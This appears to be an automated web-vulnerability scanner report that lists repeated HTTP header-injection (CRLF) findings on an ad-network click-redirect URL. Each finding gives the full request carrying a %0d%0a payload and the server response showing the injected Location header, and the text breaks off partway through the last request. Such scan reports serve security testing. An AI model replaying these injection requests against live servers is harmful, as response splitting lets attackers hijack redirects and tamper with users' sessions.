Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 17 is copied into the Location response header. The payload 55231%0d%0a41eb9b5b7e2 was submitted in the REST URL parameter 17. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/55231%0d%0a41eb9b5b7e2/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ainFset3epZbDUpISEhguZcUdZalXZcWB8aZaZcrk6J3mIXxlbJ46ntS4BY3xFUFnVtvOP6fZdGIVWo1i7AT0AlaI97igccZbtZdhqXgZcfbOuZahirPvZdrO0oaZcoN6pIka8cRZc1qecZbKBg96r3DKcWEVpt03y9hJlIRuUO3ZaBh4NIN5n3oVRFuPEHetLWH8Uk3XxHWckrmLnZa0Py7hGsZal1MorwCf0oGxjktKwIKV4ak50W6JbjN0F3FxoNxiVgtGsZdaADc3La2sMkutnEIpxB3dEsav3QLABXjSIuNBEiSnKQAgZa5C023jZdTNEFLgZbpmuZcjar8XkAG5MgcoEEV7YMPk4jIPiBetpJc5BcjnrBBUpNcO6NK1CYoDoTk4T3R9PnQCXnn2Gt0wZcxnhGQRipxWtMSaZc0foxsd6GwZdoZanO9PINdUPhRdCBO8kZbeKHnIHruUrqG5SBtICK4l45iUJLXcyLn3pfI7lgJMqZdaYd5ITOu2PSeYlZa5Nrmqt2f5l4UZbPHB3ldS2YrpPGu4vYpOtZbeF3wrKNZdGpZdVj5f10SZbpYWiPlXhVAiNELEFoH2jTtLbFCIEqvqHb8FlX; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:00 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/55231
41eb9b5b7e2/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 18 is copied into the Location response header. The payload dcb7f%0d%0a0409d70ef79 was submitted in the REST URL parameter 18. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/dcb7f%0d%0a0409d70ef79/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aUnFseON6JoCZbUxwbyU43L3PJd2TYxKQ6CulogRwxe5y32H9Y00T7R1TE6NRe2lH4vZc2y1VbCj3egjNarByCvDxDwrDcReZaXchURtE52f6J0gqo6FOBZacMlQWPgiLUm4mTLKT9Zdx8K48Zb0vC6ALZaee8gBPWZbkjqAwQIfDiwnIooanExvT6Bue7xBGhNZcPXn7ZdtMPpbhSFRpbWK2SSJtZbvNgqy7wNciR2wSZcZakE7NL8Js4gS7l9hkV6grt3Bf7hdDSvJukmrMIsh5ZaLJk3XW3CZcXHxdw7Zb1UvKUriwoYAWW2EosbHDYZdeaCU1IJjLvUje8DYY1DbNU2Oa71npoXw36oq3o56IITSGoqrTKjObqstDpUYVfFW0Qrsbg2XTp7TpItn2eDhubhvdkxFfjfXbMphy94uT7O39uuc5fZaOHfoVWKL6Zd47UsBm6ZbjNgYmKufsNZboF1WTcZbcQSgAZdNOBDr8hKyyKKcKE7fQqk7GJlGNWMjlZb7JnZdVZdeFE8t57dBJaVLOi5QBBWLQYNKtgUnO0P5Ycr3RSXnZcmYv3656ZbsEdnoUbMLqkLdMgFjZawlaJZcyaCZdpU; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:13 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/dcb7f
0409d70ef79/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 19 is copied into the Location response header. The payload e40b7%0d%0a009033edb6b was submitted in the REST URL parameter 19. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/e40b7%0d%0a009033edb6b HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aNnFNfyg6AOUA7ujQFNyvZdqnyZd0R3qZd7qY33CYXJDV1ff6FEMS5bvSWWUbuQPP8akkJeXjYFRwUI5WuSuWrEQqrcdElVheZcxZdXuRZcvQw3rI2ZcYT7TkCMKqbaxZac4WhOZdvvEKBVZb0Zc64BZb8X9mNIZdZaTh1yU040bMoN2cu45S9faOWalW4Xk7uyWWscbQjFFuBk8wr9ZbDpvrnHKjWP5Ru4B2ZbWZaeW4oLTZaN9AIKikkxWGqoFoCH4fiwnfRlsj5JOZcPOAlZdhDsfIOcIBOKvf7yOcKncZcZdydJTPJ4ZcP4KBSplfXQGKd6dPKYyDYXYZaxLEUZdIqErds2kDPP0bZcaZaWpWkkNRXrMqH8fQIZdkhvbvrlcME4QFZa4ZaZce2F2kWFt9vsZd1ccq3SETUJe0TYGOhWpZcsXVQDEYadkMv0QWZbY7vmO2VbwWZaHa23oPQaOgNCTFQ1CEPVj0eGjhis53u9rVNAkclmbQyBiV36eqpSjZb57o62w0hdUI83oBMWfBDjsjIyWpKpAFpn9OC6ZdW9uScjnVEKWquetU27TDbR4XpZc4tWfxIr2V6n4ZbVkdQK3hQ2oIqKbCILXUSl; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:17 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/e40b7
009033edb6b
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 98627%0d%0a63aef2eccd5 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/98627%0d%0a63aef2eccd5/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a5nFsesjyFASBZbZa9BmdeWQfvu9s9lqfr9Zcoewucg36vD3qfbKDBr9qs1U9t8f7pPRJfoe1770IZdZbSVXaVXmSpGV3RSs6Zc87XHjv5yFHVupkqpwsrZcRtnW8dA86o4Djmr34F0IpAvuSy8ZcGHhjR8UH360Dw4gAGqZcwmZadWS4KQlZbxwGfKZcjBFKf8mlBM5ZaJRroCQpfXRZd1UirkqXADnaHSOgY8JWCZa6E3gfcR7D7BVgQo5Zd3FmYhpdnJmHfWuNEwURs5PmCuViMgEpnPXWAJd4v6FBg9J8AWZdPOJPFX9rAw4n6WlbK9YZaDkAM3NmuGitZbsZcZbZcIpwSus6pmYl1bAZcwC5QdYA6ff0JI1CM1jmW94THsOhiiwXyIKwsEGk3K6jrFumytqZdv1nm3PrtS8ZcS5uo0O8yCx5G8Pgx4ZafCfWD0c4sHrBP6fFR6nt1QVq6DbCpA7Zc5tw1kyP3gHywbUv9geU9InwIFs4Qj7ewxZar9RAeVIoFeF2yXLsH47ZdaXZd14UZdBVmnbPyfdJw2E1YKmQp5DNykhppI3Ghdr9TbKrgqTNmVh9E98DDW8cIl2ZcScJRqZaCY48; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:18 GMT;
Content-Type: text/html
Location: 98627
63aef2eccd5/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 4bdfc%0d%0a7f541205292 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/4bdfc%0d%0a7f541205292/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aCnFNfO5nPuBPRokUUrOvKVAnOUHaTCPu54jkhQg4Zdv4XjIWPMVt7Za1qyQnUqkGWOMZahIDRsgV2eNZbmmjGmtMcNsGiJGVAcwsPq64IYujFJuRwu8jAcNcWaqHLgZapPUhaFdff7gIcwUoJTr7QxH0AiDg2j3Zac1wm0XZag0cxCFStF2hn1A7HNyvrrgM3ZdFYqBLfNC9pacvCrt88V9WHseTW8Su40hK344CRZb5guZdZbCqIoN7yDOBcMKaeTtd9vZbXD8t4kKwfr2Yl72QZaAwjntycZdSWDOpomq3uRISkcp0PomwctHgpKNDLa2UxmuoZd61hhFWmacobmeySFlNEqcGh2ABSU227oTv6ZcW9rWfEdaZbq5rYloZdtGuGmZbVULarah6ZaCf7mdy8kwoZcRrx3wnlpWD3xieE5flFaVUf3LhqGqtJZb54O6wXg5t8OE2BX33vCX2VIQinjUL95gyS3YOpcp7Gm0SFX6PUP8vBQyRsRqMY9IfSEGSpv8XunVimrYontjNoZbjmcke9wGpOHs4xUA02tujUaQQ1V2oSfOI3Hx1oheFqWASAFDJXXFq3wCuMc7yN88uYZc; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:35 GMT;
Content-Type: text/html
Location: http:/4bdfc
7f541205292/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 2b87a%0d%0ac9befaa23d0 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/2b87a%0d%0ac9befaa23d0/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=annFseoZdUQMo2HpivbwkXqrnTC3Gq4ZamyyXMNuQ5tpx4qkEqfbRrjjSdPNrBJTcUkZaZbfXx2aKlrIsUwBiFxVnWqtR1BUNFc109MAN5UxU7cik5WAjeajoV6F5D8yNswhqCd0j5AJcfQPB9oPXqfZcAqlKyrSZdNZdqVN0GeGG1mnmxdZaCyfIWG4u4vHZcvTyFdnGocxbW98c7xrVkIT71ESOa599qlUM0MVlGAAkV0iw1qCrwbsAlxlN5neGdydMBFHQpGefVxuZaMkal3YBuBBujHnmccCxp6NSXVhUNs60b1Zauc1EcPpcHJeM3e2Wc1078PTcXxVjmnBFn5dJP4g7SPr256gAwQ1YkNiaQGZcXWWjQsmqujiB6upZby3yueQ29GUBvLrDtOi0Fj2ZbqoowZbfNtZd6gS0QBsJvXmOYcpJy2aBMZaiaZdlfyn40bLvCnlcefNPFZd4snxT3weDudy0nIClYV2ZaxEQRuDyEyVFqSf3Yhl4Q1BvbnUjgasDkMdmmS4qvtHAh5YCmijb840ZaPQBB8SPmXwbugWTqNa4F3UNTra9nipGgdSIJAdcrUQLybFteG5r6G5g; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:47 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/2b87a
c9befaa23d0/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload f77aa%0d%0a016a8b52948 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/f77aa%0d%0a016a8b52948/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
